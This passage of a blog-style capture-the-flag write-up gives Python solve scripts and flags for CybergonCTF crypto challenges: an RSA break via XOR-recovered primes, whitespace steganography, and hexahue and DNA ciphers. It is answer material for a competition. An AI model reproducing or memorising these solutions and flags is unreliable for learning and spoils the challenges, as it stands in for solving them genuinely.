class="string">&#x27;516&#x27;</span>]</span><br><span class="line"></span><br><span class="line">qx = [<span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;517&#x27;</span>, <span class="string">&#x27;512&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;516&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;518&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;514&#x27;</span>, <span class="string">&#x27;519&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;522&#x27;</span>, <span class="string">&#x27;513&#x27;</span>, <span class="string">&#x27;523&#x27;</span>, <span class="string">&#x27;515&#x27;</span>, <span class="string">&#x27;522&#x27;</span>]</span><br><span class="line"></span><br><span class="line">n = <span class="number">130127292446949390212867735855086334421393298489352915445932034098974310494854685420188208182244644737973417566696954612517320009326051854904532961110247688311376993922989760554696056080388241259670599567937477306283613224095383043997900439331609449744523632839529123448169800791720798913702566069153373216373</span></span><br><span class="line"></span><br><span class="line">c = <span class="number">7888201563339715729523532042336435671029501468546161810089984232235554861652583632887518799780638295517969338796557433802757791039299392111133348792678647433923838996453867899867154174775001564873158918992088753165448384991560929913405612800913117217515602253774065754803427581757277751978337814275689105334</span></span><br><span class="line"></span><br><span class="line">pxi = [<span class="built_in">int</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> px]</span><br><span class="line">qxi = [<span class="built_in">int</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> qx]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> num <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">512</span>, <span class="number">512</span>+<span class="number">16</span>):</span><br><span class="line">    p = [pxi[i] ^ num <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(pxi))]</span><br><span class="line">    p = <span class="built_in">int</span>(<span class="string">&#x27;&#x27;</span>.join(<span class="built_in">str</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> p))</span><br><span class="line">    </span><br><span class="line">    q = [qxi[i] ^ num <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(pxi))]</span><br><span class="line">    q = <span class="built_in">int</span>(<span class="string">&#x27;&#x27;</span>.join(<span class="built_in">str</span>(i) <span class="keyword">for</span> i <span class="keyword">in</span> q))</span><br><span class="line">    </span><br><span class="line">    nt = p * q</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> n == nt:</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">t = (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line">d = <span class="built_in">pow</span>(e, -<span class="number">1</span>, t)</span><br><span class="line"></span><br><span class="line">m = <span class="built_in">pow</span>(c, d, n)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">bytes</span>.fromhex(<span class="built_in">hex</span>(m)[<span class="number">2</span>::]))</span><br></pre></td></tr></table></figure>

<h3 id="Now-You-See-Me-1"><a href="#Now-You-See-Me-1" class="headerlink" title="Now You See Me 1"></a>Now You See Me 1</h3><p>Score: 50<br>Attachment: <a href="crypto/Now%20You%20See%20Me%201/Now_You_See_Me.txt">Now_You_See_Me.txt</a></p>
<p>Flag can be decoded by replace space with 0 and tab with 1 to form a binary number which then can be turned into characters, and print the result by filter only the printable characters</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line">file_path = <span class="string">&#x27;./Now_You_See_me.txt&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">&#x27;r&#x27;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    file_lines = file.readlines()</span><br><span class="line">    s = <span class="string">&quot;&quot;</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span> line <span class="keyword">in</span> file_lines:</span><br><span class="line">        modified_line = line.replace(<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;0&#x27;</span>).replace(<span class="string">&#x27;\t&#x27;</span>, <span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">        char = <span class="built_in">bytes</span>.fromhex(<span class="string">f&#x27;<span class="subst">&#123;<span class="built_in">int</span>(modified_line.strip(), <span class="number">2</span>):02x&#125;</span>&#x27;</span>).decode()</span><br><span class="line">        <span class="keyword">if</span> char <span class="keyword">in</span> string.printable:</span><br><span class="line">            s += char</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">print</span>(s)</span><br></pre></td></tr></table></figure>

<p>Result:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Congratulations this is for you !!</span><br><span class="line"></span><br><span class="line">CybergonCTF&#123;Always_Look_Beyond_What_You_Can_See&#125;</span><br></pre></td></tr></table></figure>

<p>Flag: <code>CybergonCTF&#123;Always_Look_Beyond_What_You_Can_See&#125;</code></p>
<h3 id="dO-nOT-aCCESS"><a href="#dO-nOT-aCCESS" class="headerlink" title="dO nOT aCCESS"></a>dO nOT aCCESS</h3><p>Score: 150<br>Attachment: <a href="crypto/dO%20nOT%20aCCESS/Crypto1.PNG">Crypto1.PNG</a></p>
<p>The challenge gave us this image, which we can use image reverse search tool to identify when type of encoding is it. We found out that it is hexahue encoding</p>
<p><img src="crypto/dO%20nOT%20aCCESS/Crypto1.PNG"></p>
<p>To make our life easier, I removed the padding so that scripting is easier</p>
<p><img src="crypto/dO%20nOT%20aCCESS/fix.png"></p>
<p>Here goes the script:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image</span><br><span class="line"></span><br><span class="line">image_path = <span class="string">&#x27;fix.png&#x27;</span></span><br><span class="line">image = Image.<span class="built_in">open</span>(image_path)</span><br><span class="line"></span><br><span class="line">width, height = image.size</span><br><span class="line"></span><br><span class="line">mini_block_size = <span class="number">26</span></span><br><span class="line">block_size_x = <span class="number">2</span> * mini_block_size</span><br><span class="line">block_size_y = <span class="number">3</span> * mini_block_size</span><br><span class="line">line_space = <span class="number">9</span></span><br><span class="line">line_num = <span class="number">6</span></span><br><span class="line">block_num = <span class="number">10</span></span><br><span class="line">mid_block = <span class="built_in">int</span>(mini_block_size / <span class="number">2</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">white = (<span class="number">255</span>, <span class="number">255</span>, <span class="number">255</span>)</span><br><span class="line">black = (<span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">red = (<span class="number">255</span>, <span class="number">0</span>, <span class="number">0</span>)</span><br><span class="line">green = (<span class="number">128</span>, <span class="number">255</span>, <span class="number">0</span>)</span><br><span class="line">blue = (<span class="number">0</span>, <span class="number">0</span>, <span class="number">255</span>)</span><br><span class="line">yellow = (<span class="number">255</span>, <span class="number">255</span>, <span class="number">0</span>)</span><br><span class="line">light_blue = (<span class="number">0</span>, <span class="number">255</span>, <span class="number">255</span>)</span><br><span class="line">magenta = (<span class="number">255</span>, <span class="number">0</span>, <span class="number">255</span>)</span><br><span class="line">gray = (<span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">hexahue = &#123;&#125;</span><br><span class="line">hexahue[(magenta, red, green, yellow, blue, light_blue)] = <span class="string">&#x27;a&#x27;</span></span><br><span class="line">hexahue[(red, magenta, green, yellow, blue, light_blue)] = <span class="string">&#x27;b&#x27;</span></span><br><span class="line">hexahue[(red, green, magenta, yellow, blue, light_blue)] = <span class="string">&#x27;c&#x27;</span></span><br><span class="line">hexahue[(red, green, yellow, magenta, blue, light_blue)] = <span class="string">&#x27;d&#x27;</span></span><br><span class="line">hexahue[(red, green, yellow, blue, magenta, light_blue)] = <span class="string">&#x27;e&#x27;</span></span><br><span class="line">hexahue[(red, green, yellow, blue, light_blue, magenta)] = <span class="string">&#x27;f&#x27;</span></span><br><span class="line">hexahue[(green, red, yellow, blue, light_blue, magenta)] = <span class="string">&#x27;g&#x27;</span></span><br><span class="line">hexahue[(green, yellow, red, blue, light_blue, magenta)] = <span class="string">&#x27;h&#x27;</span></span><br><span class="line">hexahue[(green, yellow, blue, red, light_blue, magenta)] = <span class="string">&#x27;i&#x27;</span></span><br><span class="line">hexahue[(green, yellow, blue, light_blue, red, magenta)] = <span class="string">&#x27;j&#x27;</span></span><br><span class="line">hexahue[(green, yellow, blue, light_blue, magenta, red)] = <span class="string">&#x27;k&#x27;</span></span><br><span class="line">hexahue[(yellow, green, blue, light_blue, magenta, red)] = <span class="string">&#x27;l&#x27;</span></span><br><span class="line">hexahue[(yellow, blue, green, light_blue, magenta, red)] = <span class="string">&#x27;m&#x27;</span></span><br><span class="line">hexahue[(yellow, blue, light_blue, green, magenta, red)] = <span class="string">&#x27;n&#x27;</span></span><br><span class="line">hexahue[(yellow, blue, light_blue, magenta, green, red)] = <span class="string">&#x27;o&#x27;</span></span><br><span class="line">hexahue[(yellow, blue, light_blue, magenta, red, green)] = <span class="string">&#x27;p&#x27;</span></span><br><span class="line">hexahue[(blue, yellow, light_blue, magenta, red, green)] = <span class="string">&#x27;q&#x27;</span></span><br><span class="line">hexahue[(blue, light_blue, yellow, magenta, red, green)] = <span class="string">&#x27;r&#x27;</span></span><br><span class="line">hexahue[(blue, light_blue, magenta, yellow, red, green)] = <span class="string">&#x27;s&#x27;</span></span><br><span class="line">hexahue[(blue, light_blue, magenta, red, yellow, green)] = <span class="string">&#x27;t&#x27;</span></span><br><span class="line">hexahue[(blue, light_blue, magenta, red, green, yellow)] = <span class="string">&#x27;u&#x27;</span></span><br><span class="line">hexahue[(light_blue, blue, magenta, red, green, yellow)] = <span class="string">&#x27;v&#x27;</span></span><br><span class="line">hexahue[(light_blue, magenta, blue, red, green, yellow)] = <span class="string">&#x27;w&#x27;</span></span><br><span class="line">hexahue[(light_blue, magenta, red, blue, green, yellow)] = <span class="string">&#x27;x&#x27;</span></span><br><span class="line">hexahue[(light_blue, magenta, red, green, blue, yellow)] = <span class="string">&#x27;y&#x27;</span></span><br><span class="line">hexahue[(light_blue, magenta, red, green, yellow, blue)] = <span class="string">&#x27;z&#x27;</span></span><br><span class="line">hexahue[(black, white, white, black, black, white)] = <span class="string">&#x27;.&#x27;</span></span><br><span class="line">hexahue[(white, black, black, white, white, black)] = <span class="string">&#x27;,&#x27;</span></span><br><span class="line">hexahue[(white, white, white, white, white, white)] = <span class="string">&#x27; &#x27;</span></span><br><span class="line">hexahue[(black, black, black, black, black, black)] = <span class="string">&#x27; &#x27;</span></span><br><span class="line">hexahue[(black, gray, white, black, gray, white)] = <span class="string">&#x27;0&#x27;</span></span><br><span class="line">hexahue[(gray, black, white, black, gray, white)] = <span class="string">&#x27;1&#x27;</span></span><br><span class="line">hexahue[(gray, white, black, black, gray, white)] = <span class="string">&#x27;2&#x27;</span></span><br><span class="line">hexahue[(gray, white, black, gray, black, white)] = <span class="string">&#x27;3&#x27;</span></span><br><span class="line">hexahue[(gray, white, black, gray, white, black)] = <span class="string">&#x27;4&#x27;</span></span><br><span class="line">hexahue[(white, gray, black, gray, white, black)] = <span class="string">&#x27;5&#x27;</span></span><br><span class="line">hexahue[(white, black, gray, gray, white, black)] = <span class="string">&#x27;6&#x27;</span></span><br><span class="line">hexahue[(white, black, gray, white, gray, black)] = <span class="string">&#x27;7&#x27;</span></span><br><span class="line">hexahue[(white, black, gray, white, black, gray)] = <span class="string">&#x27;8&#x27;</span></span><br><span class="line">hexahue[(black, white, gray, white, black, gray)] = <span class="string">&#x27;9&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">round_rgb_components</span>(<span class="params">rgb_tuple</span>):</span><br><span class="line">    rounded_values = []</span><br><span class="line">    <span class="keyword">for</span> value <span class="keyword">in</span> rgb_tuple:</span><br><span class="line">        <span class="keyword">if</span> value &lt; <span class="number">64</span>:</span><br><span class="line">            rounded_values.append(<span class="number">0</span>)</span><br><span class="line">        <span class="keyword">elif</span> value &lt; <span class="number">192</span>:</span><br><span class="line">            rounded_values.append(<span class="number">128</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            rounded_values.append(<span class="number">255</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">tuple</span>(rounded_values)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">chars = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> <span class="built_in">range</span>(line_num):</span><br><span class="line">    <span class="keyword">for</span> char <span class="keyword">in</span> <span class="built_in">range</span>(block_num):</span><br><span class="line">        char_tuple = []</span><br><span class="line">        <span class="keyword">for</span> y <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">3</span>):</span><br><span class="line">            <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">2</span>):</span><br><span class="line">                mini_block_x = mid_block + x * mini_block_size + char * block_size_x</span><br><span class="line">                mini_block_y = mid_block + y * mini_block_size + line * (block_size_y + line_space)</span><br><span class="line">                char_tuple.append(round_rgb_components(image.getpixel((mini_block_x, mini_block_y))))</span><br><span class="line">        </span><br><span class="line">        chars.append(hexahue[<span class="built_in">tuple</span>(char_tuple)])  </span><br><span class="line">        </span><br><span class="line">data = <span class="string">&#x27;&#x27;</span>.join(chars)</span><br><span class="line"><span class="built_in">print</span>(data)</span><br></pre></td></tr></table></figure>

<p>Output:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">acttcgtagttgcgattcccattggaattctggttgctcgcttctttgaagttcctctcg</span><br></pre></td></tr></table></figure>

<p>We can see that it’s a sequence of DNA, try searching DNA cipher on Google and we found this <a target="_blank" rel="noopener" href="https://github.com/karma9874/DNA-Cipher-Script-CTF">https://github.com/karma9874/DNA-Cipher-Script-CTF</a>. We can modify the script to suite our challenge like so:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">dna = <span class="string">&#x27;acttcgtagttgcgattcccattggaattctggttgctcgcttctttgaagttcctctcg&#x27;</span></span><br><span class="line"></span><br><span class="line">mapping = &#123;</span><br><span class="line">        <span class="string">&#x27;AAA&#x27;</span>:<span class="string">&#x27;a&#x27;</span>,<span class="string">&#x27;AAC&#x27;</span>:<span class="string">&#x27;b&#x27;</span>,<span class="string">&#x27;AAG&#x27;</span>:<span class="string">&#x27;c&#x27;</span>,<span class="string">&#x27;AAT&#x27;</span>:<span class="string">&#x27;d&#x27;</span>,<span class="string">&#x27;ACA&#x27;</span>:<span class="string">&#x27;e&#x27;</span>,<span class="string">&#x27;ACC&#x27;</span>:<span class="string">&#x27;f&#x27;</span>, <span class="string">&#x27;ACG&#x27;</span>:<span class="string">&#x27;g&#x27;</span>,<span class="string">&#x27;ACT&#x27;</span>:<span class="string">&#x27;h&#x27;</span>,<span class="string">&#x27;AGA&#x27;</span>:<span class="string">&#x27;i&#x27;</span>,<span class="string">&#x27;AGC&#x27;</span>:<span class="string">&#x27;j&#x27;</span>,<span class="string">&#x27;AGG&#x27;</span>:<span class="string">&#x27;k&#x27;</span>,<span class="string">&#x27;AGT&#x27;</span>:<span class="string">&#x27;l&#x27;</span>,<span class="string">&#x27;ATA&#x27;</span>:<span class="string">&#x27;m&#x27;</span>,<span class="string">&#x27;ATC&#x27;</span>:<span class="string">&#x27;n&#x27;</span>,<span class="string">&#x27;ATG&#x27;</span>:<span class="string">&#x27;o&#x27;</span>,<span class="string">&#x27;ATT&#x27;</span>:<span class="string">&#x27;p&#x27;</span>,<span class="string">&#x27;CAA&#x27;</span>:<span class="string">&#x27;q&#x27;</span>,<span class="string">&#x27;CAC&#x27;</span>:<span class="string">&#x27;r&#x27;</span>,<span class="string">&#x27;CAG&#x27;</span>:<span class="string">&#x27;s&#x27;</span>,<span class="string">&#x27;CAT&#x27;</span>:<span class="string">&#x27;t&#x27;</span>,<span class="string">&#x27;CCA&#x27;</span>:<span class="string">&#x27;u&#x27;</span>,<span class="string">&#x27;CCC&#x27;</span>:<span class="string">&#x27;v&#x27;</span>,<span class="string">&#x27;CCG&#x27;</span>:<span class="string">&#x27;w&#x27;</span>,<span class="string">&#x27;CCT&#x27;</span>:<span class="string">&#x27;x&#x27;</span>,<span class="string">&#x27;CGA&#x27;</span>:<span class="string">&#x27;y&#x27;</span>,<span class="string">&#x27;CGC&#x27;</span>:<span class="string">&#x27;z&#x27;</span>,<span class="string">&#x27;CGG&#x27;</span>:<span class="string">&#x27;A&#x27;</span>,<span class="string">&#x27;CGT&#x27;</span>:<span class="string">&#x27;B&#x27;</span>,<span class="string">&#x27;CTA&#x27;</span>:<span class="string">&#x27;C&#x27;</span>,<span class="string">&#x27;CTC&#x27;</span>:<span class="string">&#x27;D&#x27;</span>,<span class="string">&#x27;CTG&#x27;</span>:<span class="string">&#x27;E&#x27;</span>,<span class="string">&#x27;CTT&#x27;</span>:<span class="string">&#x27;F&#x27;</span>,<span class="string">&#x27;GAA&#x27;</span>:<span class="string">&#x27;G&#x27;</span>,<span class="string">&#x27;GAC&#x27;</span>:<span class="string">&#x27;H&#x27;</span>,<span class="string">&#x27;GAG&#x27;</span>:<span class="string">&#x27;I&#x27;</span>,<span class="string">&#x27;GAT&#x27;</span>:<span class="string">&#x27;J&#x27;</span>,<span class="string">&#x27;GCA&#x27;</span>:<span class="string">&#x27;K&#x27;</span>,<span class="string">&#x27;GCC&#x27;</span>:<span class="string">&#x27;L&#x27;</span>,<span class="string">&#x27;GCG&#x27;</span>:<span class="string">&#x27;M&#x27;</span>,<span class="string">&#x27;GCT&#x27;</span>:<span class="string">&#x27;N&#x27;</span>,<span class="string">&#x27;GGA&#x27;</span>:<span class="string">&#x27;O&#x27;</span>,<span class="string">&#x27;GGC&#x27;</span>:<span class="string">&#x27;P&#x27;</span>,<span class="string">&#x27;GGG&#x27;</span>:<span class="string">&#x27;Q&#x27;</span>,<span class="string">&#x27;GGT&#x27;</span>:<span class="string">&#x27;R&#x27;</span>,<span class="string">&#x27;GTA&#x27;</span>:<span class="string">&#x27;S&#x27;</span>,<span class="string">&#x27;GTC&#x27;</span>:<span class="string">&#x27;T&#x27;</span>,<span class="string">&#x27;GTG&#x27;</span>:<span class="string">&#x27;U&#x27;</span>,<span class="string">&#x27;GTT&#x27;</span>:<span class="string">&#x27;V&#x27;</span>,<span class="string">&#x27;TAA&#x27;</span>:<span class="string">&#x27;W&#x27;</span>,<span class="string">&#x27;TAC&#x27;</span>:<span class="string">&#x27;X&#x27;</span>,<span class="string">&#x27;TAG&#x27;</span>:<span class="string">&#x27;Y&#x27;</span>,<span class="string">&#x27;TAT&#x27;</span>:<span class="string">&#x27;Z&#x27;</span>,<span class="string">&#x27;TCA&#x27;</span>:<span class="string">&#x27;1&#x27;</span>,<span class="string">&#x27;TCC&#x27;</span>:<span class="string">&#x27;2&#x27;</span>,<span class="string">&#x27;TCG&#x27;</span>:<span class="string">&#x27;3&#x27;</span>,<span class="string">&#x27;TCT&#x27;</span>:<span class="string">&#x27;4&#x27;</span>,<span class="string">&#x27;TGA&#x27;</span>:<span class="string">&#x27;5&#x27;</span>,<span class="string">&#x27;TGC&#x27;</span>:<span class="string">&#x27;6&#x27;</span>,<span class="string">&#x27;TGG&#x27;</span>:<span class="string">&#x27;7&#x27;</span>,<span class="string">&#x27;TGT&#x27;</span>:<span class="string">&#x27;8&#x27;</span>,<span class="string">&#x27;TTA&#x27;</span>:<span class="string">&#x27;9&#x27;</span>,<span class="string">&#x27;TTC&#x27;</span>:<span class="string">&#x27;0&#x27;</span>,<span class="string">&#x27;TTG&#x27;</span>:<span class="string">&#x27; &#x27;</span>,<span class="string">&#x27;TTT&#x27;</span>:<span class="string">&#x27;.&#x27;</span>&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decode_dna</span>(<span class="params">string</span>):</span><br><span class="line">    final=<span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="built_in">len</span>(string),<span class="number">3</span>):</span><br><span class="line">        final+=mapping[string[i:i+<span class="number">3</span>]]</span><br><span class="line">    <span class="keyword">return</span> final</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">flag = <span class="string">f&#x27;CybergonCTF&#123;&#123;<span class="subst">&#123;decode_dna(dna.upper()).replace(<span class="string">&quot; &quot;</span>, <span class="string">&quot;_&quot;</span>)&#125;</span>&#125;&#125;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<p>Flag: <code>CybergonCTF&#123;h3Y_y0u_G07_DN4_c0D3&#125;</code></p>

  </div>
</article>



        
          <div id="footer-post-container">
